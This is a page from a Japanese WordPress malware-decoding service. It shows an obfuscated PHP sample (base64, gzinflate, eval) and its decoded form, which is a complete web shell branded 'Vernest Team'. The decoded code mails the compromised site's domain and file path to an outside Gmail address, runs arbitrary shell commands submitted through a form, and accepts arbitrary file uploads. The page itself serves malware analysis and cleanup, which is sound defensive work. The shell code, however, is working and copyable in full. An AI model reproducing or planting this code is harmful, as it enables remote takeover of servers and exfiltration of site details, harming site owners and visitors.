Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5\x61TmJJ\x61lYWUmJx\x61lmJvEpq\x63n5K\x61k\x61xSVFR\x61llGio\x2bmRWaUGAN\x41\x41\x3d\x3d"; $Lix = "=Ed5R0n9WZs9B8n9bnOx+s1MCA9JKbLrinjfa6cOjLl822em3cXik0oByqap/U2EO2arMGqs1GaAbIptOHcb1G0zbVjJiJdzw5qSjtxMuBanTazs5Li+cz6otaANsRjtlZdtXLjpzm8vwyAE7fB6qQDEd8K8WFmAkNQ19O7CHhvl+H5tkzaxmPxM2ryXQqQYcdTjDoBpgeLmfZ2GtLAKDrQeDmRfOA7lsASFLAU34yjQk543INIy6YZiuEj4TZkqgabzAHV9FjZfeTgO6sNqaimEkh+A4LAIgM9daTW7DeP1eAxF++6Aom1oXHAhnCi1vwFSPlwbA4H0N8jka2ObTYjTEDMnZft5SNnI87Y0guVMfiuWntqvA+sgVguW0QFG31GHyub+sp6cU1pElPLD/7MT1KA0J6PNBzDIYV5qCoLYKZCtCkqH9OAAXpI7netAAmBoC6iI5j0mzN2v9jdfwVoWXOdvKWOsjVmktxPPtCoqes5NmRIqETYuSQMKGQjgC5GqGUoBJxd0e6O465z5jM+IqTMbhOxep1PSqIwsw8cXIs+mGtYVtVnWGKjfZhl9GX7aUbBrMfwVtB5jQi92+WkFWvRZGS032tqdxKpiau7+1aENV/tX53jfCEBr/FhlnrBMrP1RlfFjQhZVgl9GuXN9KE8qV9MRDIiDXBTn37ozcma0VVszYfP7Sz4bxa8Evt1KhRD+5OobIOP1KvG4MWVdiVbUVgMwE6iNVogbZ4Q2B7zFcFbUx6JDh4Hgg6iI+9d2RNJoagdAnJK9Z/ZjcyH8luNMAJ8pW3a5rB6T+S6K9ehf0RUaSl60TIIa44qp6Lxqn0V2uWEB37cgZsnmALOuRNVgmZ7dMlgoZq0ItXGswYS7AxLo08TuL8kQyGqMRmVpExVB/6TmTAI7XvsvHyYL4gTGPqohkwKzdDBRmGArgkYB3Eodj7+9+eIuvLQl+qinI01gejHoyfzVusVt1uJl5Y18rc6T1y14KVbUyARJQC/9i+3PobssdaSpa8DHywee1LgcB0AUb9dnXe+219efvvDP+hpdzfN4b365VbZSnIxfDWTlIa1q34YKVg70GYYUewSfxsjhHmSYPCyXcv7HAJa7fCVKqrb2AEvWyacYuZbsKJftrtKH19raEGUaRnByMF6eCL5PKoMfynIL7TVJL7opG1sqjTZwQTi7AvuGPUHwRvNU1mOyaXHwQzOrcY3FgAAch0ZgPyVfZLE4ne5PcGRAhBBfVhDbFoRN35qUxEOUkUUlAmOwAQa0kybAfiqzJRhpyeU8mRJ3ssS5aNtW8l6eAe9qaKyUk/DcBJGYUv7e/gy1SfGCq4JAA++puMV1Jhj0ahHHHaJkAnmaGMYnZtRIopjLb6MR949tTcx06CI8ByOCaqzfNMKnOGnDvUu6ra3yKvs+X/7SlS59WW6wNp20+6ucXyipgT6xzACM/KHBZV4gFpEkwzHyA7X0CfqyoBZzPfpRCvKHNwRvCiQOgcRGHPI9ouEAGU7HBpsCk8QiODI35SKuNBebHl9UPBbK0SSBLHIiJK4DeEgOzEBjDuzc+7pOfN67YPdwT84eXMg5IpjPRjYf2ngBMJER+I6yiMOx6X2ciMJ0soJkAotlOQJzJWRIypJNjgChk9mrc2cmkav/MkGOnhiYwLMZg/K+mizlvzuowdphtQ5RAMZ7VHI8mR1JEEmPwpp06AXBOf5qFoULfgk0e/IlODCLpKuIxbOOaoBkFWQyLJIzAgO/c5TH/N9H7jFL/N+vHu163zu/xz1HPAVKx/g7juZqt3LOHe7p3YgGzRv/nxzM+/YTjvPv/9RddeReT3le3lg9FqqgmQUBtAQIhEJGt4FMjWhgYHdFGOf5nYLVpa/xWlDY7lHOSwJ4lvtIOtDKYyqK0FmPQqH28bvSrm2rmd5MzhNhw3IIgRiWQGjMDZ9FJ2jQmpt9cQ+dn22NderO8OC94//PwCJ68I06oWrNbzeiSFqGYQCFooBZUIUq5ZICkRjNQg0jGz42l9anxGdwNAdqTExE+yIjVRBer4TMceAmi+mMEFAzO1kcX5C4Su0YtgF6kZmHUycxVwEaJWK7MfUqM95QF+VUYCd1JWxjeAE1jYKZlGToRyhYMiCij7ZaZAyFsHbFD54rXP6JpLnUqmgNJBDiXqr1ZIDJBP0XiAfq7xesU2wG+VwmEJcEt3l/g/247zn5ZBhsKxHg85sLzJ/NcT20jYys6jqkV6h+gqhC16CPV4EZFU6mXwGctlk2DzVfh5eMmx3+aMjRii2Jl6oM5sAxxpgSE9Kk7Vr9Zo27/Ygv8iCKCNvGBWqmHPXNVxi2Bp39rXqK8kHZ9Oxtj27hHSFuI2imlBzjUk/K98cxVn+wrPvWeCSfUjMluybEfe71neZQ+9pPu84d3y3WSFhPBHC7XytZ5pnc7vjfv8Mjd7rLv++1t2W7stoxjbsru8xxPuaMMpklipL+527P+673WLw0FGUjO+fGktHjv96XPN+bbu5pGf3Vn9+qzu+47LEyZgQ4g67LP9yXPwIiodsEh8zZBrQ/6hn34C9nYcIQTht0M4ll1fSjU4iEBN2FEIyK1Dux1DFspO2xUSZikMRCkgf67me/3JN2hIJ7/fCQBvA59LbfNmH08ITZMLpPbJiVys9IMk9u9UazbnU6NT62NBCQUCZM26Cw7eSxH03M/+vG6otc7fVtciH+Zcg5BwJe47wBxHA+Jcg9BgPBHsfA"; eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto)))); exit; ?>
<?php
$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGio+mRWaUGANAA==";
$Lix = "=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";
eval {
session_start();
error_reporting(0);
function login()
{
$pesan = "DOMAIN => " . $_SERVER["HTTP_HOST"] . "\n";
$pesan .= "LOCATION => " . strval("/var/www/html") . "\n";
$pesan .= "LOCATION 2 => " . $_SERVER["SCRIPT_FILENAME"];
$headers = "[!] IKAN MASUK [!]";
$subject = "DOMAIN DARI " . $_SERVER["HTTP_HOST"];
$tomail = "fmost6689@gmail.com";
mail($tomail, $subject, $pesan, $headers);
$_SESSION['login'] = true;
echo "<script>window.location='?';</script>";
exit;
}
if (!isset($_SESSION["login"])) {
login();
die;
}
if ($_POST['king'] == "") {
$curcmd = "ls -la";
} else {
$curcmd = $_POST['king'];
}
?>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow">
<title>Vernest Team</title>
<link rel="shortcut icon" href="https://i.ibb.co.com/KWHWhRF/1721891682-picsay.jpg" type="image/x-icon" />
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<style>@import url(https://fonts.googleapis.com/css2?family=Metal+Mania&display=swap);*{font-family:"Metal Mania",system-ui;}
.copy {text-decoration: none;padding: 5px;background: #3c3c3cb3;text-align: center;border-radius: 2px;position: fixed;bottom: 0;right: 0;color: #fff!important;}
.box-height{display:flex;justify-content:center;align-items:center;height:100vh}.box{width:80%;padding:20px;background:#1e1919;border-radius:3px;box-shadow:rgb(46 174 50 / .35) 0 5px 20px 15px}input{border:1px;outline:none!important}textarea:hover,textarea:focus{box-shadow:none!important;border:none!important}.oke{border:1px solid #fff}img{width:130px}
.circle{width:140px;height:auto;margin:auto;display:block;text-align:center;border-radius:50%;border:5px solid rgb(32 180 21 / .45);box-shadow: rgb(32 180 21 / .45) 2px 20px 30px -5px;}</style>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
</head>
<body class="bg-dark text-light">
<a href="https://chat.whatsapp.com/F0UfJF2huGEF8V842FM3X0" target="_blank" class="copy">© Copyright - Vernest Team</a>
<div class="box-height">
<div class="box">
<div class="circle">
<img src="https://i.ibb.co.com/1b6dcBG/1721891682-picsay-removebg-preview.png" alt="vernest logo">
</div>
<form class="mt-3" method="post" enctype="multipart/form-data">
<div class="form-group mb-4">
<div class="d-flex gap-1">
<input type="hidden" name="dir" value="<?php
echo $curdir;
?>" />
<input type="file" name="fila" class="form-control" />
<button type="submit" class="btn btn-success" name="upl" value="Upload">upload</button>
</div>
</div>
<div class="form-group">
<?php
if ($_POST['upl'] == "Upload") {
if (move_uploaded_file($_FILES['fila']['tmp_name'], "./" . $_FILES['fila']['name'])) {
//echo "<script>alert('');</script>";
echo '
<script>
Swal.fire({
title: "Good job!",
text: "The file has been uploaded",
icon: "success"
});
</script>
';
} else {
echo '
<script>
Swal.fire({
title: "Upss!",
text: "There was an error uploading the file, please try again!",
icon: "error"
});
</script>
';
}
}
?>
<textarea class="form-control bg-dark text-light border-0" rows="4" readonly ><?php
if ($_POST['exe'] == "Execute") {
$curcmd = $curcmd;
$f = popen($curcmd, "r");
while (!feof($f)) {
$buffer = fgets($f, 4096);
$string .= $buffer;
}
pclose($f);
echo htmlspecialchars($string);
} else {
echo "terminal output";
}
?></textarea>
<div class="d-flex w-100 gap-2 p-2 bg-dark my-2">
<span class="text-light mt-1">$</span>
<div class="w-100 d-flex gap-2">
<input type="text" name="king" value="<?php
echo $curcmd;
?>" class="bg-dark w-100 text-light outline-0 border-0">
<button type="submit" name="exe" value="Execute" class="btn btn-sm btn-outline-success">send</button>
</div>
</div>
</div>
</form>
</div>
</div>
</body>
</html><?php
};
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.